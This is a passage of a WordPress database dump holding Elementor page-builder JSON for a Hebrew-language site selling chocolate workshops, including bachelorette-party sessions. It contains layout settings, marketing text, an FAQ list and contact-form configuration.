5e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c86322f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2d61da37\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1006,203,'_elementor_version','0.4'),(1008,199,'_elementor_data','[{\"id\":\"5ae558de\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"76867a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"6b7a424b\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29eb19f8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"859196c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"72d55618\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"407e28c0\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"415b3ee2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6383ac34\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55e4ccad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cc23117\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"65d5b2bb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3453d936\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2e2fb1ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"489f7aa8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"1507f0f7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25c3fc17\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b29f897\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"12851db1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28303ac7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"725a935c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"47ca8a3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3924078b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1038fd3f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"61c45866\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2e9becfa\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3a36cf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f6f68b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e887a15\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 